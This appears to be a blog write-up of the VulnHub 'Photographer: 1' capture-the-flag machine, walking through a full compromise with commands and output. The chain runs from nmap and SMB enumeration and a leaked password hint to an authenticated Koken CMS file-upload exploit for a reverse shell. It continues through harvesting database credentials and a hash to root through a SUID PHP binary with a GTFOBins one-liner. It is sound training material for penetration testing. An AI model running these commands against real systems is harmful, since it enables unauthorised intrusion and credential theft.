https://vulnhub.com/entry/photographer-1,519/
In this CTF, an Nmap scan revealed open ports HTTP (80, 8000) and SMB (139, 445). The scan also identified services running on these ports, such as Apache and Samba. Followed this up by using enum4linux to enumerate Samba shares and users, which revealed the presence of potentially sensitive files.
By accessing the Samba share using smbclient and downloading two files, including a WordPress backup and a text file containing a potential password hint. Using Dirbuster an /admin directory on the Koken CMS running on port 8000 was identified. Logging in with the discovered credentials, using an exploit from searchsploit to upload a malicious file and gain a reverse shell.
Once inside the system LinPEAS located credentials for the MySQL database, which allowed further exploration of the system. A key discovery was that the PHP 7.2 binary had the SUID bit set, enabling privilege escalation to root using a technique from GTFOBins.
Run nmap -A
to discover ports 80,139,445,8000:
└─$ nmap -A -sC -p- 192.168.5.124
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 19:18 UTC
Nmap scan report for 192.168.5.124
Host is up (0.31s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Photographer by v1n1v131r4
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn?
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: daisa ahomi
Service Info: Host: PHOTOGRAPHER
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: photographer
| NetBIOS computer name: PHOTOGRAPHER\x00
| Domain name: \x00
| FQDN: photographer
|_ System time: 2024-08-11T22:20:47-04:00
| smb2-time:
| date: 2024-08-12T02:20:47
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 8h19m58s, deviation: 2h18m33s, median: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.97 seconds
Run enum4linux
to discover samba shares and local users:
...
==========================================
| Share Enumeration on 192.168.5.124 |
==========================================
[V] Attempting to get share list using authentication
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP PHOTOGRAPHER
...
S-1-22-1-1000 Unix User\daisa (Local User)
S-1-22-1-1001 Unix User\agi (Local User)
...
Use smbclient
to connect to the sambashare
share as the guest
user and download the share contents:
└─$ smbclient \\\\192.168.5.124\\sambashare --user=guest 1 ⨯
Enter WORKGROUP\guest's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jul 20 18:30:07 2020
.. D 0 Tue Jul 21 02:44:25 2020
mailsent.txt N 503 Mon Jul 20 18:29:40 2020
wordpress.bkp.zip N 13930308 Mon Jul 20 18:22:23 2020
278627392 blocks of size 1024. 264268400 blocks available
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (19.6 KiloBytes/sec) (average 19.6 KiloBytes/sec)
smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (10282.6 KiloBytes/sec) (average 10092.2 KiloBytes/sec)
smb: \> exit
View the mailsent.txt
file.. there is a hint indicating a possible password babygirl
:
└─$ cat mailsent.txt
Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <[email protected]>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <[email protected]>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
Run dirbuster
to discover the /admin
page:
└─$ dirb http://192.168.5.124:8000 /usr/share/wordlists/dirb/common.txt -f
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 11 19:47:32 2024
URL_BASE: http://192.168.5.124:8000/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
OPTION: Fine tunning of NOT_FOUND detection
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.5.124:8000/ ----
...
==> DIRECTORY: http://192.168.5.124:8000/admin/
+ http://192.168.5.124:8000/admin.cgi (CODE:302|SIZE:0)
+ http://192.168.5.124:8000/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.124:8000/admin.pl (CODE:302|SIZE:0)
+ http://192.168.5.124:8000/akeeba.backend.log (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.124:8000/app/
...
==> DIRECTORY: http://192.168.5.124:8000/storage/
Login to the koken /admin page using the following credentials:
[email protected]:babygirl
Use searchsploit
to find a koken exploit affecting the specific version of koken on the target:
─$ searchsploit koken
---------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) | php/webapps/48706.txt
---------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(vagrant㉿kali)-[~/Downloads]
└─$ searchsploit -x 48706
Exploit: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
URL: https://www.exploit-db.com/exploits/48706
Path: /usr/share/exploitdb/exploits/php/webapps/48706.txt
Codes: N/A
Verified: False
File Type: ASCII text
Follow the instructions in the exploit to get a netcat
reverse shell.
Run linpeas
to find the local mysql
database user password:
╔══════════╣ Searching passwords in config PHP files
/var/www/html/koken/app/application/config/database.php:$db['default']['password'] = $db_config['password'];
/var/www/html/koken/storage/configuration/database.php: 'password' => 'user_password_here',
View the database username/password in /var/www/html/koken/storage/configuration/database.php
<?php
return array(
'hostname' => 'localhost',
'database' => 'koken',
'username' => 'kokenuser',
'password' => 'user_password_here',
'prefix' => 'koken_',
'socket' => ''
);
Connect to local mysql server and list local databases:
mysql -u kokenuser -puser_password_here -h 127.0.0.1 -e "show databases;"
Database
information_schema
koken
Show all tables in the koken
database:
$ mysql -u kokenuser -puser_password_here -h 127.0.0.1 -D koken -e "show tables;"
Tables_in_koken
koken_albums
koken_applications
koken_categories
koken_content
koken_drafts
koken_history
koken_join_albums_categories
koken_join_albums_content
koken_join_albums_covers
koken_join_albums_tags
koken_join_albums_text
koken_join_categories_content
koken_join_categories_text
koken_join_content_tags
koken_join_tags_text
koken_plugins
koken_settings
koken_slugs
koken_tags
koken_text
koken_trash
koken_urls
koken_users
View the koken_users
table to see the password hash for the daisa
user (which we already know is babygirl
):
$ mysql -u kokenuser -puser_password_here -h 127.0.0.1 -D koken -e "select * from koken_users;"
id password email created_on modified_on first_name last_name public_first_name public_last_name public_display public_email twitter facebook google internal_id remember_me
1 $2a$08$ruF3jtzIEZF1JMy/osNYj.ibzEiHWYCE4qsC6P/sMBZorx2ZTSGwK [email protected] 1595292775 1723430563 daisa ahomidaisa ahomi both [email protected] NULL NULL NULL 6d9505613547705d48ec6ac1792b18e0 4b0176d800bd42bfaf0c6969ea66be3d
Use the find command to discover that the php7.2
binary is SUID root enabled:
$ find / -user root -perm -4000 -print 2>/dev/null | xargs ls -lh | egrep -v "/bin/mount|/bin/su|/bin/ping|/bin/umount|/usr/bin/chfn|/usr/bin/locate|/usr/bin/ssh-agent|/usr/bin/sudo|/usr/bin/passwd|/usr/bin/gpasswd|/usr/bin/newgrp|/usr/bin/lockfile|/usr/bin/at|/usr/bin/chage|/usr/bin/crontab|/usr/bin/sudoedit|/usr/bin/chsh|/usr/kerberos/bin/ksu|/usr/libexec/utempter/utempter|openssh/ssh-keysign|/usr/lib/squid/ncsa_auth|/usr/lib/squid/pam_auth|vmware-user-suid-wrapper|/usr/lib/news/bin/startinnfeed|/usr/lib/news/bin/inndstart|/usr/bin/wall|/usr/bin/write|/usr/sbin/usernetctl|/usr/sbin/suexec|/usr/sbin/lockdev|/usr/sbin/userhelper|/usr/sbin/ccreds_validate|dbus-daemon-launch-helper|pam_timestamp_check|/sbin/unix_chkpwd|/sbin/netreport|/sbin/mount|/sbin/umount|/bin/fusermount|bin/pppd|/usr/bin/X|/usr/bin/mlocate|/usr/lib/news/bin/rnews|/usr/sbin/userisdnctl|sendmail.sendmail|hal-mtab-lock|/usr/bin/rcp|/usr/bin/rsh|/usr/bin/rlogin|ccreds_chkpwd|pt_chown|plugin-config|proximity-helper"
...
-rwsr-xr-x 1 root root 4.7M Jul 9 2020 /usr/bin/php7.2
Escalate privileges to root using the PHP SUID binary (see https://gtfobins.github.io/gtfobins/php/):
www-data@photographer:/$ /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
# whoami
whoami
root
Member discussion: